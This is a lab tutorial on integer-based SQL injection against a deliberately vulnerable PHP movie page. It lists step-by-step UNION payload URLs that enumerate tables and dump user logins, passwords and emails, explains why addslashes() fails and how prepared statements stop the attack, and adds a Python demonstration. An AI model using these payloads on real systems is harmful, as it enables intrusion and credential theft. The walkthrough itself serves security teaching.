Integer-based injection

Basic workflow

Find the injection point and check whether injection is possible

1 and 1=1 #
# normal response
1 and 1=2 #
# error response
# if both hold, the parameter is injectable

http://192.168.80.2/sqli_2.php?movie=100+or+1=1#&action=go
192.168.80.2/sqli_2.php?movie=1+and+1=1#&action=go
192.168.80.2/sqli_2.php?movie=1+and+1=2#&action=go
Determine the number of columns

1 order by 7 #
-- normal response
1 order by 8 #
-- error response

192.168.80.2/sqli_2.php?movie=1+order+by+7#&action=go
192.168.80.2/sqli_2.php?movie=1+order+by+8#&action=go
Find which column positions are displayed

0 union select 1,2,3,4,5,6,7 #
-- UNION appends the rows of the second SELECT to those of the first; 0 is used because no movie has that id, so the first SELECT returns nothing and the page displays the injected values

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,2,3,4,5,6,7#&action=go
Use built-in functions to read database information

database(), version(), user(), ...

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,database(),version(),user(),5,6,7#&action=go
List table names

0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()

group_concat() joins the retrieved table names into a single string, which is easier to read.
where table_schema=database() restricts the result to the tables of the current database; without it every table in every schema is returned, far too many to display in full.

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()#&action=go
Get the column names of a table

0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name="users"+and+table_schema=database()#&action=go
Information relevant to privilege escalation

http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users#&action=go
-- only one row is displayed
-- rows can be pulled out one at a time with LIMIT
--http://192.168.80.2/sqli_2.php?movie=0+union+select+1,login,password,secret,email,6,7+from+users limit 1,1#&action=go

LIMIT accepts one or two integer arguments:
- one argument: SELECT * FROM table LIMIT 5; // returns the first 5 rows; in other words, LIMIT n is equivalent to LIMIT 0,n.
- two arguments (the first is the row offset to start from, the second the maximum number of rows): SELECT * FROM table LIMIT 5,10; // returns rows 6-15

The output can also be concatenated with group_concat:
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #
Practice

low
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,'-',password,'-') from users limit 0,1),3,4,5,6,7 #

mid
The input is filtered with addslashes(). The characters affected are the single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
Integer-based injection is unaffected: the value is not enclosed in quotes, so there is no quote to close and nothing for addslashes() to escape.
http://192.168.80.2/sqli_2.php?movie=0+union+select 1,(select group_concat(login,password) from users limit 0,1),3,4,5,6,7 #

high
Prepared statements are used to prevent SQL injection
$id = $_GET["movie"];
$sql = "SELECT title, release_year, genre, main_character, imdb FROM movies WHERE id =?";
// ? is a placeholder; the value is supplied later when the parameter is bound
if($stmt = $link->prepare($sql))
// if($stmt = mysqli_prepare($link, $sql))
{
    // Binds the parameters for markers
    $stmt->bind_param("s", $id);
    // mysqli_stmt_bind_param($stmt, "s", $id);
    // Executes the query
    $stmt->execute();
    // mysqli_stmt_execute($stmt);
    // Binds the result variables
    $stmt->bind_result($title, $release_year, $genre, $main_character, $imdb);
    // mysqli_stmt_bind_result($stmt, $title, $release_year, $genre, $main_character, $imdb);
    // Stores the result, necessary to count the number of rows
    $stmt->store_result();
    // mysqli_stmt_store_result($stmt);
    // Prints the number of rows
    // printf("Number of rows: %d.\n", mysqli_stmt_num_rows($stmt));
}
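To make the mid-versus-high difference concrete, here is an added Python example (not from the original page or the application it walks through) that puts the addslashes()-only lookup next to the bound-parameter lookup; it uses an in-memory sqlite3 database with constructed movies and users tables in place of MySQL, an addslashes() emulation written for this example, and a quote-free UNION payload of the same shape as the page's.

```python
import sqlite3

# Constructed sample data standing in for the page's movies/users tables
# (sqlite3 in memory instead of MySQL so the example runs offline).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE movies(id INTEGER, title TEXT, release_year INTEGER);
        INSERT INTO movies VALUES (1, 'Iron Man', 2008), (2, 'Avatar', 2009);
        CREATE TABLE users(login TEXT, password TEXT);
        INSERT INTO users VALUES ('alice', 'hash1'), ('bob', 'hash2');
    """)
    return conn

def addslashes(s):
    # Emulates PHP addslashes(): escapes only ' " \ and NUL.
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))

def lookup_mid(conn, movie):
    # "mid" level: escaped, but still concatenated unquoted into the SQL text.
    # With no quote to break out of, the escaping never comes into play.
    sql = "SELECT title, release_year FROM movies WHERE id = " + addslashes(movie)
    return conn.execute(sql).fetchall()

def lookup_high(conn, movie):
    # "high" level: placeholder plus bound parameter; the input travels as a
    # value, so "0 union select ..." is compared against id, never parsed as SQL.
    sql = "SELECT title, release_year FROM movies WHERE id = ?"
    return conn.execute(sql, (movie,)).fetchall()

def lookup_strict(conn, movie):
    # Belt and braces for an integer id: reject anything that is not an integer
    # before it reaches the database (the equivalent of binding with type "i").
    if not movie.isdigit():
        raise ValueError("movie id must be an integer")
    return lookup_high(conn, int(movie))

# Same quote-free UNION payload shape the walkthrough uses against the movie id.
PAYLOAD = "0 union select login, password from users"

def run_demo():
    conn = make_db()
    return {
        "mid_normal": lookup_mid(conn, "1"),
        "mid_payload": lookup_mid(conn, PAYLOAD),
        "high_normal": lookup_high(conn, "1"),
        "high_payload": lookup_high(conn, PAYLOAD),
    }
```

run_demo() returns the users rows under "mid_payload" and an empty list under "high_payload": the same request that addslashes() lets through is a harmless non-matching id once it is bound as a parameter.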